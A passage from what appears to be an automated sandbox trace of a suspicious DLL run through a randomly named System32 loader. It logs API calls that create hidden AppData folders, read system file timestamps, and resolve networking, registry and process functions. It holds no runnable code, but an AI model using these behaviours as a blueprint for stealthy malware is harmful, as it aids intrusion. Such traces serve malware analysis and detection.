lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.339] GetLastError () returned 0x0 [0032.339] GetLastError () returned 0x0 [0032.339] GetLastError () returned 0x0 [0032.339] GetLastError () returned 0x0 [0032.339] GetLastError () returned 0x0 [0032.339] GetLastError () returned 0x0 [0032.339] GetLastError () returned 0x0 [0032.339] GetLastError () returned 0x0 [0032.340] GetLastError () returned 0x0 [0032.340] GetLastError () returned 0x0 [0032.340] GetLastError () returned 0x0 [0032.340] GetLastError () returned 0x0 [0032.340] GetLastError () returned 0x0 [0032.340] GetLastError () returned 0x0 [0032.340] GetLastError () returned 0x0 [0032.340] GetLastError () returned 0x0 [0032.340] GetLastError () returned 0x0 [0032.340] GetLastError () returned 0x0 [0032.340] GetLastError () returned 0x0 [0032.340] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.340] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0032.340] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.340] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.340] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.340] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.340] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0032.340] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0032.340] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0032.340] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0032.340] GetLastError () returned 0xb7 [0032.340] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.340] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0032.340] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0032.341] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0032.341] wsprintfA (in: param_1=0x14f7e0, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.341] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0032.341] wsprintfA (in: param_1=0x14f6dc, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.341] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.341] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0032.341] CloseHandle (hObject=0x74) returned 1 [0032.341] GetLastError () returned 0x0 [0032.341] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0032.341] GetLastError () returned 0x0 [0032.341] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0032.341] GetSystemDirectoryA (in: lpBuffer=0x14f7e0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.341] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.341] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0032.341] CloseHandle (hObject=0x74) returned 1 [0032.342] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.342] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.342] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0032.343] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.343] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0032.343] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0032.343] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0032.343] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0032.343] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0032.343] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0032.343] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0032.344] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0032.345] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0032.345] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0032.345] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0032.345] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0032.345] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0032.345] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0032.345] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0032.345] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0032.345] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0032.345] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0032.345] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.345] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0032.345] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0032.345] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0032.345] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0032.345] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0032.345] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0032.345] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0032.345] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0032.346] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0032.346] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0032.346] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0032.346] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0032.346] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0032.346] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0032.346] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0032.346] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0032.346] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0032.346] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0032.346] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0032.346] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0032.346] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0032.346] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0032.346] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0032.346] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.346] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.346] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.346] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0032.348] HeapDestroy (hHeap=0x410000) returned 1 Process: id = "21" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f900" os_pid = "0xb4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllGetClassObject /fn_args=\"1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1024 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1025 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1026 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1027 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1028 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1029 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1030 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1031 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1032 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1033 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1034 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1035 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1036 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1037 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1038 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1039 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1040 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1041 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1042 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1043 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1044 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1045 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1046 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1047 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1048 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1049 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1050 start_va = 0x120000 end_va = 0x1e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1051 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1052 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1053 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1054 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1055 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 1056 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 1057 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1058 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1059 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1060 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1061 start_va = 0x2f0000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1062 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1063 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1064 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Thread: id = 48 os_tid = 0xb50 [0032.385] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef8dc | out: lpSystemTimeAsFileTime=0x2ef8dc*(dwLowDateTime=0xe107b470, dwHighDateTime=0x1d3dfba)) [0032.385] GetCurrentProcessId () returned 0xb4c [0032.385] GetCurrentThreadId () returned 0xb50 [0032.385] GetTickCount () returned 0x17416 [0032.385] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef8d4 | out: lpPerformanceCount=0x2ef8d4*=363630138) returned 1 [0032.386] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.386] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0032.386] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0032.386] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0032.386] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0032.386] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.386] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.386] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.386] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.387] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.387] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.387] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.387] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.387] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.387] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.387] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.387] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.387] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.387] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.387] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.388] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.388] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.388] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.388] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.388] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.388] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.388] GetCurrentThreadId () returned 0xb50 [0032.388] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllGetClassObject /fn_args=\"1\"" [0032.388] GetEnvironmentStringsW () returned 0x3f7860* [0032.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0032.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x3709f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0032.388] FreeEnvironmentStringsW (penv=0x3f7860) returned 1 [0032.388] GetStartupInfoA (in: lpStartupInfo=0x2ef82c | out: lpStartupInfo=0x2ef82c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0032.389] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0032.389] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0032.389] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0032.389] SetHandleCount (uNumber=0x20) returned 0x20 [0032.389] GetLastError () returned 0x0 [0032.389] SetLastError (dwErrCode=0x0) [0032.389] GetLastError () returned 0x0 [0032.389] SetLastError (dwErrCode=0x0) [0032.389] GetLastError () returned 0x0 [0032.389] SetLastError (dwErrCode=0x0) [0032.389] GetACP () returned 0x4e4 [0032.389] GetLastError () returned 0x0 [0032.389] SetLastError (dwErrCode=0x0) [0032.389] IsValidCodePage (CodePage=0x4e4) returned 1 [0032.389] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2ef80c | out: lpCPInfo=0x2ef80c) returned 1 [0032.389] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2ef2d8 | out: lpCPInfo=0x2ef2d8) returned 1 [0032.389] GetLastError () returned 0x0 [0032.389] SetLastError (dwErrCode=0x0) [0032.389] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x2ef268 | out: lpCharType=0x2ef268) returned 1 [0032.389] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef6ec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.389] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef6ec, cbMultiByte=256, lpWideCharStr=0x2ef058, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0032.389] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 